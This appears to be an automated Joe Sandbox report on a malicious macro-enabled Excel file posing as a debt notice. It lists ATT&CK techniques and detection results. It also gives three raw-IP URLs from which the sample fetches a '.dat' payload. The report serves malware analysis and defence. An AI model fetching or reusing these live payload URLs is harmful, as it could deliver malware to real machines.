Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting32Path InterceptionExtra Window Memory Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting32LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Extra Window Memory Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Outstanding-Debt-170373600-05042021.xlsm2%ReversingLabsWin32.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
http://45.153.229.23/44313,6048108796.dat5%VirustotalBrowse
http://45.153.229.23/44313,6048108796.dat0%Avira URL Cloudsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
http://5.34.179.36/44313,6048108796.dat0%Avira URL Cloudsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
http://91.211.91.81/44313,6048108796.dat0%Avira URL Cloudsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://45.153.229.23/44313,6048108796.datfalse
  • 5%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://5.34.179.36/44313,6048108796.datfalse
  • Avira URL Cloud: safe
unknown
http://91.211.91.81/44313,6048108796.datfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.comBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
    high
    https://login.microsoftonline.com/BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
      high
      https://shell.suite.office.com:1443BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
          high
          https://autodiscover-s.outlook.com/BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
              high
              https://cdn.entity.BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/queryBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkeyBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                    high
                    https://powerlift.acompli.netBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                      high
                      https://cortana.aiBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspxBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.comBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                high
                                https://api.aadrm.com/BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                      high
                                      https://cr.office.comBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControlBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/OfficeBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                            high
                                            https://graph.ppe.windows.netBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptioneventsBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.netBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.comBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplateBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.comBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplateBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetectBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.msBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groupsBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                            high
                                                            https://graph.windows.netBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.comBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/apiBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetectBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.jsonBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspxBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                    high
                                                                                    https://management.azure.comBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.comBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/iosBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmediaBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.comBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/ActivitiesBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                high
                                                                                                https://api.office.netBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.comBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policiesBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.comBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocationBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/logBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.comBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorizeBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/importsBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.comBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v2BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/macBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.comBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.aiBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.comBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/BC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devicesBC845148-00A9-4205-955C-A92C29B04445.0.drfalse
                                                                                                                                                high

                                                                                                                                                Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                91.211.91.81
                                                                                                                                                unknownUkraine
                                                                                                                                                206638HOSTFORYUAfalse
                                                                                                                                                5.34.179.36
                                                                                                                                                unknownUkraine
                                                                                                                                                204957GREENFLOID-ASUAfalse
                                                                                                                                                45.153.229.23
                                                                                                                                                unknownRussian Federation
                                                                                                                                                25229VOLIA-ASUAfalse

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                Analysis ID:404124
                                                                                                                                                Start date:04.05.2021
                                                                                                                                                Start time:18:26:36
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 4m 57s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:light
                                                                                                                                                Sample file name:Outstanding-Debt-170373600-05042021.xlsm
                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Run name:Potential for more IOCs and behavior
                                                                                                                                                Number of analysed new started processes analysed:24
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • GSI enabled (VBA)
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal60.expl.evad.winXLSM@1/9@0/3
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .xlsm
                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                • Attach to Office via COM
                                                                                                                                                • Scroll down
                                                                                                                                                • Close Viewer
                                                                                                                                                Warnings:
                                                                                                                                                Show All
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 104.43.193.48, 52.147.198.201, 92.122.145.220, 13.107.4.50, 40.88.32.150, 52.109.88.177, 52.109.8.24, 52.109.88.40, 52.109.88.38, 13.64.90.137, 13.88.21.125, 20.82.210.154, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129, 184.30.24.56, 20.50.102.62
